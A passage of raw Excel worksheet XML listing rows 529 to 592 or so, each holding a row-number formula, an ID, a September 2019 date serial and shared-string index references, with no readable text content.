      <c r="E529" t="s">
        <v>1054</v>
      </c>
      <c r="F529" t="s">
        <v>10526</v>
      </c>
      <c r="G529" t="s">
        <v>1055</v>
      </c>
    </row>
    <row r="530" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A530">
        <f t="shared" si="8"/>
        <v>529</v>
      </c>
      <c r="B530">
        <v>529</v>
      </c>
      <c r="C530" t="s">
        <v>3</v>
      </c>
      <c r="D530" s="1">
        <v>43709</v>
      </c>
      <c r="E530" t="s">
        <v>1056</v>
      </c>
      <c r="F530" t="s">
        <v>10021</v>
      </c>
      <c r="G530" t="s">
        <v>1057</v>
      </c>
    </row>
    <row r="531" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A531">
        <f t="shared" si="8"/>
        <v>530</v>
      </c>
      <c r="B531">
        <v>530</v>
      </c>
      <c r="C531" t="s">
        <v>3</v>
      </c>
      <c r="D531" s="1">
        <v>43727</v>
      </c>
      <c r="E531" t="s">
        <v>1058</v>
      </c>
      <c r="F531" t="s">
        <v>10021</v>
      </c>
      <c r="G531" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="532" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A532">
        <f t="shared" si="8"/>
        <v>531</v>
      </c>
      <c r="B532">
        <v>531</v>
      </c>
      <c r="C532" t="s">
        <v>3</v>
      </c>
      <c r="D532" s="1">
        <v>43725</v>
      </c>
      <c r="E532" t="s">
        <v>1060</v>
      </c>
      <c r="F532" t="s">
        <v>9975</v>
      </c>
      <c r="G532" t="s">
        <v>1061</v>
      </c>
    </row>
    <row r="533" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A533">
        <f t="shared" si="8"/>
        <v>532</v>
      </c>
      <c r="B533">
        <v>532</v>
      </c>
      <c r="C533" t="s">
        <v>3</v>
      </c>
      <c r="D533" s="1">
        <v>43710</v>
      </c>
      <c r="E533" t="s">
        <v>1062</v>
      </c>
      <c r="F533" t="s">
        <v>9975</v>
      </c>
      <c r="G533" t="s">
        <v>1063</v>
      </c>
    </row>
    <row r="534" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A534">
        <f t="shared" si="8"/>
        <v>533</v>
      </c>
      <c r="B534">
        <v>533</v>
      </c>
      <c r="C534" t="s">
        <v>3</v>
      </c>
      <c r="D534" s="1">
        <v>43724</v>
      </c>
      <c r="E534" t="s">
        <v>1064</v>
      </c>
      <c r="F534" t="s">
        <v>10021</v>
      </c>
      <c r="G534" t="s">
        <v>1065</v>
      </c>
    </row>
    <row r="535" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A535">
        <f t="shared" si="8"/>
        <v>534</v>
      </c>
      <c r="B535">
        <v>534</v>
      </c>
      <c r="C535" t="s">
        <v>3</v>
      </c>
      <c r="D535" s="1">
        <v>43715</v>
      </c>
      <c r="E535" t="s">
        <v>1066</v>
      </c>
      <c r="F535" t="s">
        <v>9975</v>
      </c>
      <c r="G535" t="s">
        <v>1067</v>
      </c>
    </row>
    <row r="536" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A536">
        <f t="shared" si="8"/>
        <v>535</v>
      </c>
      <c r="B536">
        <v>535</v>
      </c>
      <c r="C536" t="s">
        <v>3</v>
      </c>
      <c r="D536" s="1">
        <v>43721</v>
      </c>
      <c r="E536" t="s">
        <v>1068</v>
      </c>
      <c r="F536" t="s">
        <v>9975</v>
      </c>
      <c r="G536" t="s">
        <v>1069</v>
      </c>
    </row>
    <row r="537" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A537">
        <f t="shared" si="8"/>
        <v>536</v>
      </c>
      <c r="B537">
        <v>536</v>
      </c>
      <c r="C537" t="s">
        <v>3</v>
      </c>
      <c r="D537" s="1">
        <v>43717</v>
      </c>
      <c r="E537" t="s">
        <v>1070</v>
      </c>
      <c r="F537" t="s">
        <v>10526</v>
      </c>
      <c r="G537" t="s">
        <v>1071</v>
      </c>
    </row>
    <row r="538" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A538">
        <f t="shared" si="8"/>
        <v>537</v>
      </c>
      <c r="B538">
        <v>537</v>
      </c>
      <c r="C538" t="s">
        <v>3</v>
      </c>
      <c r="D538" s="1">
        <v>43719</v>
      </c>
      <c r="E538" t="s">
        <v>1072</v>
      </c>
      <c r="F538" t="s">
        <v>9975</v>
      </c>
      <c r="G538" t="s">
        <v>1073</v>
      </c>
    </row>
    <row r="539" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A539">
        <f t="shared" si="8"/>
        <v>538</v>
      </c>
      <c r="B539">
        <v>538</v>
      </c>
      <c r="C539" t="s">
        <v>3</v>
      </c>
      <c r="D539" s="1">
        <v>43719</v>
      </c>
      <c r="E539" t="s">
        <v>1074</v>
      </c>
      <c r="F539" t="s">
        <v>9978</v>
      </c>
      <c r="G539" t="s">
        <v>1075</v>
      </c>
    </row>
    <row r="540" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A540">
        <f t="shared" si="8"/>
        <v>539</v>
      </c>
      <c r="B540">
        <v>539</v>
      </c>
      <c r="C540" t="s">
        <v>3</v>
      </c>
      <c r="D540" s="1">
        <v>43734</v>
      </c>
      <c r="E540" t="s">
        <v>1076</v>
      </c>
      <c r="F540" t="s">
        <v>9975</v>
      </c>
      <c r="G540" t="s">
        <v>1077</v>
      </c>
    </row>
    <row r="541" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A541">
        <f t="shared" si="8"/>
        <v>540</v>
      </c>
      <c r="B541">
        <v>540</v>
      </c>
      <c r="C541" t="s">
        <v>3</v>
      </c>
      <c r="D541" s="1">
        <v>43720</v>
      </c>
      <c r="E541" t="s">
        <v>1078</v>
      </c>
      <c r="F541" t="s">
        <v>10021</v>
      </c>
      <c r="G541" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="542" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A542">
        <f t="shared" si="8"/>
        <v>541</v>
      </c>
      <c r="B542">
        <v>541</v>
      </c>
      <c r="C542" t="s">
        <v>3</v>
      </c>
      <c r="D542" s="1">
        <v>43728</v>
      </c>
      <c r="E542" t="s">
        <v>1080</v>
      </c>
      <c r="F542" t="s">
        <v>9975</v>
      </c>
      <c r="G542" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="543" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A543">
        <f t="shared" si="8"/>
        <v>542</v>
      </c>
      <c r="B543">
        <v>542</v>
      </c>
      <c r="C543" t="s">
        <v>3</v>
      </c>
      <c r="D543" s="1">
        <v>43733</v>
      </c>
      <c r="E543" t="s">
        <v>1082</v>
      </c>
      <c r="F543" t="s">
        <v>9975</v>
      </c>
      <c r="G543" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="544" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A544">
        <f t="shared" si="8"/>
        <v>543</v>
      </c>
      <c r="B544">
        <v>543</v>
      </c>
      <c r="C544" t="s">
        <v>3</v>
      </c>
      <c r="D544" s="1">
        <v>43722</v>
      </c>
      <c r="E544" t="s">
        <v>1084</v>
      </c>
      <c r="F544" t="s">
        <v>9975</v>
      </c>
      <c r="G544" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="545" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A545">
        <f t="shared" si="8"/>
        <v>544</v>
      </c>
      <c r="B545">
        <v>544</v>
      </c>
      <c r="C545" t="s">
        <v>3</v>
      </c>
      <c r="D545" s="1">
        <v>43732</v>
      </c>
      <c r="E545" t="s">
        <v>1086</v>
      </c>
      <c r="F545" t="s">
        <v>9975</v>
      </c>
      <c r="G545" t="s">
        <v>1087</v>
      </c>
    </row>
    <row r="546" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A546">
        <f t="shared" si="8"/>
        <v>545</v>
      </c>
      <c r="B546">
        <v>545</v>
      </c>
      <c r="C546" t="s">
        <v>3</v>
      </c>
      <c r="D546" s="1">
        <v>43721</v>
      </c>
      <c r="E546" t="s">
        <v>1088</v>
      </c>
      <c r="F546" t="s">
        <v>9975</v>
      </c>
      <c r="G546" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="547" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A547">
        <f t="shared" si="8"/>
        <v>546</v>
      </c>
      <c r="B547">
        <v>546</v>
      </c>
      <c r="C547" t="s">
        <v>3</v>
      </c>
      <c r="D547" s="1">
        <v>43721</v>
      </c>
      <c r="E547" t="s">
        <v>1090</v>
      </c>
      <c r="F547" t="s">
        <v>9975</v>
      </c>
      <c r="G547" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="548" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A548">
        <f t="shared" si="8"/>
        <v>547</v>
      </c>
      <c r="B548">
        <v>547</v>
      </c>
      <c r="C548" t="s">
        <v>3</v>
      </c>
      <c r="D548" s="1">
        <v>43729</v>
      </c>
      <c r="E548" t="s">
        <v>1092</v>
      </c>
      <c r="F548" t="s">
        <v>9975</v>
      </c>
      <c r="G548" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="549" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A549">
        <f t="shared" si="8"/>
        <v>548</v>
      </c>
      <c r="B549">
        <v>548</v>
      </c>
      <c r="C549" t="s">
        <v>3</v>
      </c>
      <c r="D549" s="1">
        <v>43723</v>
      </c>
      <c r="E549" t="s">
        <v>1094</v>
      </c>
      <c r="F549" t="s">
        <v>9975</v>
      </c>
      <c r="G549" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="550" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A550">
        <f t="shared" si="8"/>
        <v>549</v>
      </c>
      <c r="B550">
        <v>549</v>
      </c>
      <c r="C550" t="s">
        <v>3</v>
      </c>
      <c r="D550" s="1">
        <v>43731</v>
      </c>
      <c r="E550" t="s">
        <v>1096</v>
      </c>
      <c r="F550" t="s">
        <v>9975</v>
      </c>
      <c r="G550" t="s">
        <v>1097</v>
      </c>
    </row>
    <row r="551" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A551">
        <f t="shared" si="8"/>
        <v>550</v>
      </c>
      <c r="B551">
        <v>550</v>
      </c>
      <c r="C551" t="s">
        <v>3</v>
      </c>
      <c r="D551" s="1">
        <v>43714</v>
      </c>
      <c r="E551" t="s">
        <v>1098</v>
      </c>
      <c r="F551" t="s">
        <v>10021</v>
      </c>
      <c r="G551" t="s">
        <v>1099</v>
      </c>
    </row>
    <row r="552" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A552">
        <f t="shared" si="8"/>
        <v>551</v>
      </c>
      <c r="B552">
        <v>551</v>
      </c>
      <c r="C552" t="s">
        <v>3</v>
      </c>
      <c r="D552" s="1">
        <v>43724</v>
      </c>
      <c r="E552" t="s">
        <v>1100</v>
      </c>
      <c r="F552" t="s">
        <v>9975</v>
      </c>
      <c r="G552" t="s">
        <v>1101</v>
      </c>
    </row>
    <row r="553" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A553">
        <f t="shared" si="8"/>
        <v>552</v>
      </c>
      <c r="B553">
        <v>552</v>
      </c>
      <c r="C553" t="s">
        <v>3</v>
      </c>
      <c r="D553" s="1">
        <v>43735</v>
      </c>
      <c r="E553" t="s">
        <v>1102</v>
      </c>
      <c r="F553" t="s">
        <v>10021</v>
      </c>
      <c r="G553" t="s">
        <v>1103</v>
      </c>
    </row>
    <row r="554" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A554">
        <f t="shared" si="8"/>
        <v>553</v>
      </c>
      <c r="B554">
        <v>553</v>
      </c>
      <c r="C554" t="s">
        <v>3</v>
      </c>
      <c r="D554" s="1">
        <v>43721</v>
      </c>
      <c r="E554" t="s">
        <v>1104</v>
      </c>
      <c r="F554" t="s">
        <v>9975</v>
      </c>
      <c r="G554" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="555" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A555">
        <f t="shared" si="8"/>
        <v>554</v>
      </c>
      <c r="B555">
        <v>554</v>
      </c>
      <c r="C555" t="s">
        <v>3</v>
      </c>
      <c r="D555" s="1">
        <v>43709</v>
      </c>
      <c r="E555" t="s">
        <v>1106</v>
      </c>
      <c r="F555" t="s">
        <v>9978</v>
      </c>
      <c r="G555" t="s">
        <v>1107</v>
      </c>
    </row>
    <row r="556" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A556">
        <f t="shared" si="8"/>
        <v>555</v>
      </c>
      <c r="B556">
        <v>555</v>
      </c>
      <c r="C556" t="s">
        <v>3</v>
      </c>
      <c r="D556" s="1">
        <v>43729</v>
      </c>
      <c r="E556" t="s">
        <v>1108</v>
      </c>
      <c r="F556" t="s">
        <v>9975</v>
      </c>
      <c r="G556" t="s">
        <v>1109</v>
      </c>
    </row>
    <row r="557" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A557">
        <f t="shared" si="8"/>
        <v>556</v>
      </c>
      <c r="B557">
        <v>556</v>
      </c>
      <c r="C557" t="s">
        <v>3</v>
      </c>
      <c r="D557" s="1">
        <v>43716</v>
      </c>
      <c r="E557" t="s">
        <v>1110</v>
      </c>
      <c r="F557" t="s">
        <v>9978</v>
      </c>
      <c r="G557" t="s">
        <v>1111</v>
      </c>
    </row>
    <row r="558" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A558">
        <f t="shared" si="8"/>
        <v>557</v>
      </c>
      <c r="B558">
        <v>557</v>
      </c>
      <c r="C558" t="s">
        <v>3</v>
      </c>
      <c r="D558" s="1">
        <v>43725</v>
      </c>
      <c r="E558" t="s">
        <v>1112</v>
      </c>
      <c r="F558" t="s">
        <v>10526</v>
      </c>
      <c r="G558" t="s">
        <v>1113</v>
      </c>
    </row>
    <row r="559" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A559">
        <f t="shared" si="8"/>
        <v>558</v>
      </c>
      <c r="B559">
        <v>558</v>
      </c>
      <c r="C559" t="s">
        <v>3</v>
      </c>
      <c r="D559" s="1">
        <v>43736</v>
      </c>
      <c r="E559" t="s">
        <v>1114</v>
      </c>
      <c r="F559" t="s">
        <v>9975</v>
      </c>
      <c r="G559" t="s">
        <v>1115</v>
      </c>
    </row>
    <row r="560" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A560">
        <f t="shared" si="8"/>
        <v>559</v>
      </c>
      <c r="B560">
        <v>559</v>
      </c>
      <c r="C560" t="s">
        <v>3</v>
      </c>
      <c r="D560" s="1">
        <v>43722</v>
      </c>
      <c r="E560" t="s">
        <v>1116</v>
      </c>
      <c r="F560" t="s">
        <v>9975</v>
      </c>
      <c r="G560" t="s">
        <v>1117</v>
      </c>
    </row>
    <row r="561" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A561">
        <f t="shared" si="8"/>
        <v>560</v>
      </c>
      <c r="B561">
        <v>560</v>
      </c>
      <c r="C561" t="s">
        <v>3</v>
      </c>
      <c r="D561" s="1">
        <v>43725</v>
      </c>
      <c r="E561" t="s">
        <v>1118</v>
      </c>
      <c r="F561" t="s">
        <v>9975</v>
      </c>
      <c r="G561" t="s">
        <v>1119</v>
      </c>
    </row>
    <row r="562" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A562">
        <f t="shared" si="8"/>
        <v>561</v>
      </c>
      <c r="B562">
        <v>561</v>
      </c>
      <c r="C562" t="s">
        <v>3</v>
      </c>
      <c r="D562" s="1">
        <v>43727</v>
      </c>
      <c r="E562" t="s">
        <v>1120</v>
      </c>
      <c r="F562" t="s">
        <v>9975</v>
      </c>
      <c r="G562" t="s">
        <v>1121</v>
      </c>
    </row>
    <row r="563" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A563">
        <f t="shared" si="8"/>
        <v>562</v>
      </c>
      <c r="B563">
        <v>562</v>
      </c>
      <c r="C563" t="s">
        <v>3</v>
      </c>
      <c r="D563" s="1">
        <v>43738</v>
      </c>
      <c r="E563" t="s">
        <v>1122</v>
      </c>
      <c r="F563" t="s">
        <v>9975</v>
      </c>
      <c r="G563" t="s">
        <v>1123</v>
      </c>
    </row>
    <row r="564" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A564">
        <f t="shared" si="8"/>
        <v>563</v>
      </c>
      <c r="B564">
        <v>563</v>
      </c>
      <c r="C564" t="s">
        <v>3</v>
      </c>
      <c r="D564" s="1">
        <v>43729</v>
      </c>
      <c r="E564" t="s">
        <v>1124</v>
      </c>
      <c r="F564" t="s">
        <v>10526</v>
      </c>
      <c r="G564" t="s">
        <v>1125</v>
      </c>
    </row>
    <row r="565" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A565">
        <f t="shared" si="8"/>
        <v>564</v>
      </c>
      <c r="B565">
        <v>564</v>
      </c>
      <c r="C565" t="s">
        <v>3</v>
      </c>
      <c r="D565" s="1">
        <v>43726</v>
      </c>
      <c r="E565" t="s">
        <v>1126</v>
      </c>
      <c r="F565" t="s">
        <v>9975</v>
      </c>
      <c r="G565" t="s">
        <v>1127</v>
      </c>
    </row>
    <row r="566" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A566">
        <f t="shared" si="8"/>
        <v>565</v>
      </c>
      <c r="B566">
        <v>565</v>
      </c>
      <c r="C566" t="s">
        <v>3</v>
      </c>
      <c r="D566" s="1">
        <v>43731</v>
      </c>
      <c r="E566" t="s">
        <v>1128</v>
      </c>
      <c r="F566" t="s">
        <v>9978</v>
      </c>
      <c r="G566" t="s">
        <v>1129</v>
      </c>
    </row>
    <row r="567" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A567">
        <f t="shared" si="8"/>
        <v>566</v>
      </c>
      <c r="B567">
        <v>566</v>
      </c>
      <c r="C567" t="s">
        <v>3</v>
      </c>
      <c r="D567" s="1">
        <v>43709</v>
      </c>
      <c r="E567" t="s">
        <v>1130</v>
      </c>
      <c r="F567" t="s">
        <v>9975</v>
      </c>
      <c r="G567" t="s">
        <v>1131</v>
      </c>
    </row>
    <row r="568" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A568">
        <f t="shared" si="8"/>
        <v>567</v>
      </c>
      <c r="B568">
        <v>567</v>
      </c>
      <c r="C568" t="s">
        <v>3</v>
      </c>
      <c r="D568" s="1">
        <v>43713</v>
      </c>
      <c r="E568" t="s">
        <v>1132</v>
      </c>
      <c r="F568" t="s">
        <v>10021</v>
      </c>
      <c r="G568" t="s">
        <v>1133</v>
      </c>
    </row>
    <row r="569" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A569">
        <f t="shared" si="8"/>
        <v>568</v>
      </c>
      <c r="B569">
        <v>568</v>
      </c>
      <c r="C569" t="s">
        <v>3</v>
      </c>
      <c r="D569" s="1">
        <v>43728</v>
      </c>
      <c r="E569" t="s">
        <v>1134</v>
      </c>
      <c r="F569" t="s">
        <v>9975</v>
      </c>
      <c r="G569" t="s">
        <v>1135</v>
      </c>
    </row>
    <row r="570" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A570">
        <f t="shared" si="8"/>
        <v>569</v>
      </c>
      <c r="B570">
        <v>569</v>
      </c>
      <c r="C570" t="s">
        <v>3</v>
      </c>
      <c r="D570" s="1">
        <v>43736</v>
      </c>
      <c r="E570" t="s">
        <v>1136</v>
      </c>
      <c r="F570" t="s">
        <v>9975</v>
      </c>
      <c r="G570" t="s">
        <v>1137</v>
      </c>
    </row>
    <row r="571" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A571">
        <f t="shared" si="8"/>
        <v>570</v>
      </c>
      <c r="B571">
        <v>570</v>
      </c>
      <c r="C571" t="s">
        <v>3</v>
      </c>
      <c r="D571" s="1">
        <v>43725</v>
      </c>
      <c r="E571" t="s">
        <v>1138</v>
      </c>
      <c r="F571" t="s">
        <v>9975</v>
      </c>
      <c r="G571" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="572" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A572">
        <f t="shared" si="8"/>
        <v>571</v>
      </c>
      <c r="B572">
        <v>571</v>
      </c>
      <c r="C572" t="s">
        <v>3</v>
      </c>
      <c r="D572" s="1">
        <v>43711</v>
      </c>
      <c r="E572" t="s">
        <v>1140</v>
      </c>
      <c r="F572" t="s">
        <v>9975</v>
      </c>
      <c r="G572" t="s">
        <v>1141</v>
      </c>
    </row>
    <row r="573" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A573">
        <f t="shared" si="8"/>
        <v>572</v>
      </c>
      <c r="B573">
        <v>572</v>
      </c>
      <c r="C573" t="s">
        <v>3</v>
      </c>
      <c r="D573" s="1">
        <v>43735</v>
      </c>
      <c r="E573" t="s">
        <v>1142</v>
      </c>
      <c r="F573" t="s">
        <v>9975</v>
      </c>
      <c r="G573" t="s">
        <v>1143</v>
      </c>
    </row>
    <row r="574" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A574">
        <f t="shared" si="8"/>
        <v>573</v>
      </c>
      <c r="B574">
        <v>573</v>
      </c>
      <c r="C574" t="s">
        <v>3</v>
      </c>
      <c r="D574" s="1">
        <v>43737</v>
      </c>
      <c r="E574" t="s">
        <v>1144</v>
      </c>
      <c r="F574" t="s">
        <v>9975</v>
      </c>
      <c r="G574" t="s">
        <v>1145</v>
      </c>
    </row>
    <row r="575" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A575">
        <f t="shared" si="8"/>
        <v>574</v>
      </c>
      <c r="B575">
        <v>574</v>
      </c>
      <c r="C575" t="s">
        <v>3</v>
      </c>
      <c r="D575" s="1">
        <v>43734</v>
      </c>
      <c r="E575" t="s">
        <v>1146</v>
      </c>
      <c r="F575" t="s">
        <v>9975</v>
      </c>
      <c r="G575" t="s">
        <v>1147</v>
      </c>
    </row>
    <row r="576" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A576">
        <f t="shared" si="8"/>
        <v>575</v>
      </c>
      <c r="B576">
        <v>575</v>
      </c>
      <c r="C576" t="s">
        <v>3</v>
      </c>
      <c r="D576" s="1">
        <v>43736</v>
      </c>
      <c r="E576" t="s">
        <v>1148</v>
      </c>
      <c r="F576" t="s">
        <v>9975</v>
      </c>
      <c r="G576" t="s">
        <v>1149</v>
      </c>
    </row>
    <row r="577" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A577">
        <f t="shared" si="8"/>
        <v>576</v>
      </c>
      <c r="B577">
        <v>576</v>
      </c>
      <c r="C577" t="s">
        <v>3</v>
      </c>
      <c r="D577" s="1">
        <v>43724</v>
      </c>
      <c r="E577" t="s">
        <v>1150</v>
      </c>
      <c r="F577" t="s">
        <v>9975</v>
      </c>
      <c r="G577" t="s">
        <v>1151</v>
      </c>
    </row>
    <row r="578" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A578">
        <f t="shared" si="8"/>
        <v>577</v>
      </c>
      <c r="B578">
        <v>577</v>
      </c>
      <c r="C578" t="s">
        <v>3</v>
      </c>
      <c r="D578" s="1">
        <v>43723</v>
      </c>
      <c r="E578" t="s">
        <v>1152</v>
      </c>
      <c r="F578" t="s">
        <v>9975</v>
      </c>
      <c r="G578" t="s">
        <v>1153</v>
      </c>
    </row>
    <row r="579" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A579">
        <f t="shared" ref="A579:A642" si="9">+ROW(A578)</f>
        <v>578</v>
      </c>
      <c r="B579">
        <v>578</v>
      </c>
      <c r="C579" t="s">
        <v>3</v>
      </c>
      <c r="D579" s="1">
        <v>43732</v>
      </c>
      <c r="E579" t="s">
        <v>1154</v>
      </c>
      <c r="F579" t="s">
        <v>10526</v>
      </c>
      <c r="G579" t="s">
        <v>1155</v>
      </c>
    </row>
    <row r="580" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A580">
        <f t="shared" si="9"/>
        <v>579</v>
      </c>
      <c r="B580">
        <v>579</v>
      </c>
      <c r="C580" t="s">
        <v>3</v>
      </c>
      <c r="D580" s="1">
        <v>43723</v>
      </c>
      <c r="E580" t="s">
        <v>1156</v>
      </c>
      <c r="F580" t="s">
        <v>10021</v>
      </c>
      <c r="G580" t="s">
        <v>1157</v>
      </c>
    </row>
    <row r="581" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A581">
        <f t="shared" si="9"/>
        <v>580</v>
      </c>
      <c r="B581">
        <v>580</v>
      </c>
      <c r="C581" t="s">
        <v>3</v>
      </c>
      <c r="D581" s="1">
        <v>43734</v>
      </c>
      <c r="E581" t="s">
        <v>1158</v>
      </c>
      <c r="F581" t="s">
        <v>10021</v>
      </c>
      <c r="G581" t="s">
        <v>1159</v>
      </c>
    </row>
    <row r="582" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A582">
        <f t="shared" si="9"/>
        <v>581</v>
      </c>
      <c r="B582">
        <v>581</v>
      </c>
      <c r="C582" t="s">
        <v>3</v>
      </c>
      <c r="D582" s="1">
        <v>43726</v>
      </c>
      <c r="E582" t="s">
        <v>1160</v>
      </c>
      <c r="F582" t="s">
        <v>9975</v>
      </c>
      <c r="G582" t="s">
        <v>1161</v>
      </c>
    </row>
    <row r="583" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A583">
        <f t="shared" si="9"/>
        <v>582</v>
      </c>
      <c r="B583">
        <v>582</v>
      </c>
      <c r="C583" t="s">
        <v>3</v>
      </c>
      <c r="D583" s="1">
        <v>43716</v>
      </c>
      <c r="E583" t="s">
        <v>1162</v>
      </c>
      <c r="F583" t="s">
        <v>10021</v>
      </c>
      <c r="G583" t="s">
        <v>1163</v>
      </c>
    </row>
    <row r="584" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A584">
        <f t="shared" si="9"/>
        <v>583</v>
      </c>
      <c r="B584">
        <v>583</v>
      </c>
      <c r="C584" t="s">
        <v>3</v>
      </c>
      <c r="D584" s="1">
        <v>43732</v>
      </c>
      <c r="E584" t="s">
        <v>1164</v>
      </c>
      <c r="F584" t="s">
        <v>9975</v>
      </c>
      <c r="G584" t="s">
        <v>1165</v>
      </c>
    </row>
    <row r="585" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A585">
        <f t="shared" si="9"/>
        <v>584</v>
      </c>
      <c r="B585">
        <v>584</v>
      </c>
      <c r="C585" t="s">
        <v>3</v>
      </c>
      <c r="D585" s="1">
        <v>43712</v>
      </c>
      <c r="E585" t="s">
        <v>1166</v>
      </c>
      <c r="F585" t="s">
        <v>9975</v>
      </c>
      <c r="G585" t="s">
        <v>1167</v>
      </c>
    </row>
    <row r="586" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A586">
        <f t="shared" si="9"/>
        <v>585</v>
      </c>
      <c r="B586">
        <v>585</v>
      </c>
      <c r="C586" t="s">
        <v>3</v>
      </c>
      <c r="D586" s="1">
        <v>43719</v>
      </c>
      <c r="E586" t="s">
        <v>1168</v>
      </c>
      <c r="F586" t="s">
        <v>10021</v>
      </c>
      <c r="G586" t="s">
        <v>1169</v>
      </c>
    </row>
    <row r="587" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A587">
        <f t="shared" si="9"/>
        <v>586</v>
      </c>
      <c r="B587">
        <v>586</v>
      </c>
      <c r="C587" t="s">
        <v>3</v>
      </c>
      <c r="D587" s="1">
        <v>43711</v>
      </c>
      <c r="E587" t="s">
        <v>1170</v>
      </c>
      <c r="F587" t="s">
        <v>9975</v>
      </c>
      <c r="G587" t="s">
        <v>1171</v>
      </c>
    </row>
    <row r="588" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A588">
        <f t="shared" si="9"/>
        <v>587</v>
      </c>
      <c r="B588">
        <v>587</v>
      </c>
      <c r="C588" t="s">
        <v>3</v>
      </c>
      <c r="D588" s="1">
        <v>43734</v>
      </c>
      <c r="E588" t="s">
        <v>1172</v>
      </c>
      <c r="F588" t="s">
        <v>9975</v>
      </c>
      <c r="G588" t="s">
        <v>1173</v>
      </c>
    </row>
    <row r="589" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A589">
        <f t="shared" si="9"/>
        <v>588</v>
      </c>
      <c r="B589">
        <v>588</v>
      </c>
      <c r="C589" t="s">
        <v>3</v>
      </c>
      <c r="D589" s="1">
        <v>43710</v>
      </c>
      <c r="E589" t="s">
        <v>1174</v>
      </c>
      <c r="F589" t="s">
        <v>9975</v>
      </c>
      <c r="G589" t="s">
        <v>1175</v>
      </c>
    </row>
    <row r="590" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A590">
        <f t="shared" si="9"/>
        <v>589</v>
      </c>
      <c r="B590">
        <v>589</v>
      </c>
      <c r="C590" t="s">
        <v>3</v>
      </c>
      <c r="D590" s="1">
        <v>43712</v>
      </c>
      <c r="E590" t="s">
        <v>1176</v>
      </c>
      <c r="F590" t="s">
        <v>9978</v>
      </c>
      <c r="G590" t="s">
        <v>1177</v>
      </c>
    </row>
    <row r="591" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A591">
        <f t="shared" si="9"/>
        <v>590</v>
      </c>
      <c r="B591">
        <v>590</v>
      </c>
      <c r="C591" t="s">
        <v>3</v>
      </c>
      <c r="D591" s="1">
        <v>43730</v>
      </c>
      <c r="E591" t="s">
        <v>1178</v>
      </c>
      <c r="F591" t="s">
        <v>9975</v>
      </c>
      <c r="G591" t="s">
        <v>1179</v>
      </c>
    </row>
    <row r="592" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A592">
        <f t="shared" si="9"/>
        <v>591</v>
      </c>
      <c r="B592">
        <v>591</v>
      </c>
      <c r="C592" t="s">
        <v>3</v>
      </c>
      <c r="D592" s="1">
        <v>43735</v>
      </c>
      <c r="E592" t="s">
        <v>1180</v>
      </c>
      <c r="F592" t="s">
        <v>9975</v>
      </c>
      <c r="G592" t="s">
        <v>1181</v>
      </c>
    </row>
    <row r="593" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A593">
        <f t="shared" si="9"/>
        <v>592</v>
      </c>
      <c r="B593">
        <v>592</v>
